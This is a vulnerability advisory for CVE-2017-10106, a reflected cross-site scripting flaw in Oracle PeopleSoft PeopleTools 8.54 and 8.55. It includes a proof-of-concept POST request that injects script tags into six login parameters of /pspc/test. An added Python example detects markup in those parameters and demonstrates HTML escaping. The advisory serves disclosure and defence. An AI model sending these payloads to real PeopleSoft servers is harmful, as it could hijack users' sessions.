Application: Oracle PeopleSoft
Versions Affected: PeopleTools 8.54, 8.55
Vendor: Oracle
Bugs: XSS
Reported: 26.01.2017
Vendor response: 27.01.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Dmitri Iudin aka @ret5et (ERPScan)
Class: XSS [CWE-79]
Risk: Medium
Impact: Modify displayed content from a Web site, steal authentication information of a user
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10106
CVSS Base Score v3: 6.1 / 10
CVSS Base Vector:

| Metric | Value |
|---|---|
| AV: Attack Vector (Related exploit range) | Network (N) |
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | Required (R) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed (C) |
| C: Impact to Confidentiality | Low (L) |
| I: Impact to Integrity | Low (L) |
| A: Impact to Availability | None (N) |
An attacker can use a special HTTP request to hijack session data of administrators or users of the web resource.
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
To correct this vulnerability, apply Oracle CPU July 2017.
POST /pspc/test?userID=<script>alert(1)</script>&password=<script>alert(2)</script>&languageCode==<script>alert(5)</script>&siteName=<script>alert(3)</script>&CREFName=<script>alert(4)</script>&portalName=<script>alert(6)</script>&command=login HTTP/1.1
Host: 172.16.2.230:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 twitter:@ret5et
Accept-Encoding: gzip, deflate
Content-Length: 0
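The following is an added example for defenders, not code from ERPScan, Oracle or PeopleTools. It does two things with the request above: it parses a request line from an access log and flags the six parameters the PoC injects into when they carry HTML markup, and it shows the output-encoding step (HTML-escaping each value before it is echoed) that prevents this class of reflected XSS. The parameter names come from the PoC; the assumption that each of them is reflected into the page, the benign second request line, and the `/pspc/test` path check are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names taken from the advisory's PoC request. The example assumes
# each of them is reflected into the response; the advisory only implies this.
REFLECTED_PARAMS = ("userID", "password", "languageCode", "siteName", "CREFName", "portalName")

# Constructed sample: the first line is the advisory's own request line, the
# second is a benign login request written for comparison.
SAMPLE_REQUEST_LINES = [
    "POST /pspc/test?userID=<script>alert(1)</script>&password=<script>alert(2)</script>"
    "&languageCode==<script>alert(5)</script>&siteName=<script>alert(3)</script>"
    "&CREFName=<script>alert(4)</script>&portalName=<script>alert(6)</script>"
    "&command=login HTTP/1.1",
    "POST /pspc/test?userID=PS&password=PS&languageCode=ENG&siteName=ps"
    "&CREFName=HOME&portalName=EMPLOYEE&command=login HTTP/1.1",
]

# Markup that has no business in a user id, site name or language code:
# an opening/closing tag, an inline event handler, or a javascript: URL.
_MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into method, path and percent-decoded query pairs."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    # keep_blank_values so 'languageCode==...' still yields a pair to inspect
    params = parse_qsl(parts.query, keep_blank_values=True)
    return method, parts.path, params


def suspicious_params(line, path="/pspc/test"):
    """Return (name, value) pairs of reflected parameters that contain markup.

    Only requests to the affected path are inspected (path is an assumption
    of this example, matching the PoC).
    """
    _method, req_path, params = parse_request_line(line)
    if req_path != path:
        return []
    return [(name, value) for name, value in params
            if name in REFLECTED_PARAMS and _MARKUP.search(value)]


def render_login_echo(params):
    """Reflect request values the safe way: HTML-escape before embedding in markup.

    This is the mitigation the fix relies on in principle; the exact PeopleTools
    change is not on the page, so this is an illustration, not Oracle's patch.
    """
    escaped = {name: html.escape(value, quote=True) for name, value in params}
    return "<p>Login for %s at site %s</p>" % (
        escaped.get("userID", ""), escaped.get("siteName", ""))


if __name__ == "__main__":
    for line in SAMPLE_REQUEST_LINES:
        hits = suspicious_params(line)
        print("%d suspicious parameter(s):" % len(hits), [name for name, _ in hits])
    _, _, poc_params = parse_request_line(SAMPLE_REQUEST_LINES[0])
    print(render_login_echo(poc_params))
```

Run over a real access log, `suspicious_params` gives a low-noise signal for attempts against this endpoint, since none of these fields should ever contain a tag; `render_login_echo` shows that once values are escaped, the injected `<script>` survives only as inert `&lt;script&gt;` text.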